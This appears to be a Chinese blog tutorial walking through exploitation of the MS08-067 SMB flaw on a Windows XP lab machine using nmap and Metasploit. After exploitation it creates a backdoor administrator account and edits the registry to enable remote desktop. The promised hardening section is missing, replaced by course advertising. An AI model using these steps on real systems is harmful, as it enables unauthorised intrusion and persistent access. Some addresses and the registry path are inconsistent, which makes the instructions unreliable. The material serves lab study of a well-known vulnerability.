2024年最新MS08-067 漏洞利用与安全加固

  • 渗透机操作系统:2024.1
  • 漏洞复现操作系统: Windows XP Professional with Service Pack 2- VL (English)
  • 安全加固复现操作系统:Windows XP Professional with Service Pack 2 (Simplified Chinese)
  • 补丁版本 : KB958644

1 MS08_067 简介

攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。

Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanonicalize 函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize 函数中发生栈缓冲内存错误,造成可被利用并远程执行代码,获得一个相对高的权限。

2 MS08_067 复现过程

在开始之前请关闭靶机的防火墙和查看445端口是否打开, 关于渗透机和靶机环境的搭建可自行Bing

步骤01、

打开网络拓补,单机 “启动”按钮,启动实现虚拟机,如图所示。

在这里插入图片描述

步骤02、

使用ifconfigipconfig命令分别获取渗透机和靶机的IP的地址,使用ping 命令进行网络 连通性测试,确保网络可达。

渗透机的IP 地址为 192.168.254.134,如图所示。

在这里插入图片描述

靶机的IP地址为 192.168.254.129,如图所示。

在这里插入图片描述

步骤03、

Namp脚本扫描靶机,使用 nmap -O -n -T4 -p445 -script smb-vuln-ms08-067 192.168.254.129 (目标靶机IP) 命令扫描靶机操作系统,如图所示。

同时确认目标靶机是否存在SMB漏洞。

如下图:找到 State:VULNERABLE 表示存在漏洞

在这里插入图片描述

步骤04、

根据扫描得到的结果,靶机的操作系统为 Windows XP。通过脚本检测搭配该操作系统包含命令执行漏洞,漏洞编号为 MS08_067, 下面通过渗透机中的利用模块对该漏洞利用,通过msfconsole 命令来启动Metasploit 漏洞渗透平台,如图所示。

启动 Metasploit

在这里插入图片描述

步骤05、

使用search 命令搜索 SMB 溢出模块MS08_067 并进行利用,如图所示。

搜索 MS08_067 溢出模块

在这里插入图片描述

步骤06、

使用 use 命令选择 exploit/Windows/smb/ms08_067_netapi 模块进行利用,然后使用 show options 命令查看需要设置的参数,如图所示。

查看配置参数

在这里插入图片描述

设置 RHOST为靶机IP,如图所示。

设置靶机地址

在这里插入图片描述

步骤07、

使用set payload 命令设置回连至控制端的载荷模块并执行如下操作,如图所示。

设置载荷模块

在这里插入图片描述

使用 show options 命令查看Payload 中需要配置的参数,如图所示。

查看 Payload 中配置的参数

在这里插入图片描述

使用 set LHOST 命令设置渗透机监听的地址,即本次实验地址 192.168.253.134 如图所示。

设置监听地址

在这里插入图片描述

使用 show targets 命令显示漏洞溢出模块 exploit 所支持的目标类型 (操作系统,软件版本等),如图所示。

显示支持的目标类型

在这里插入图片描述

步骤08、

使用 check 命令检测目标靶机是否存在漏洞,如图所示。

运行检测脚本

在这里插入图片描述

步骤09、

使用 exploit 命令执行溢出攻击模块,如图所示。

运行溢出模块

在这里插入图片描述

步骤10、

使用 cmd命令,如 netstat -an 查看端口开发情况,如图所示。

查看开发端口

在这里插入图片描述

步骤11、

使用 net user 用户名密码/add 命令创建用户,如图所示。

创建后门用户

在这里插入图片描述

步骤12、

使用 net localgroup administrators 用户名 /add 命令将新用户添加到 administrator 分组(提升到管理员),如图所示。

添加用户到管理员分组

在这里插入图片描述

步骤13、

使用 REG ADD HKLM\SYSTEM\CurrentControSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 命令设置注册表,如图所示。

设置注册表

在这里插入图片描述

步骤14、

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 17
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值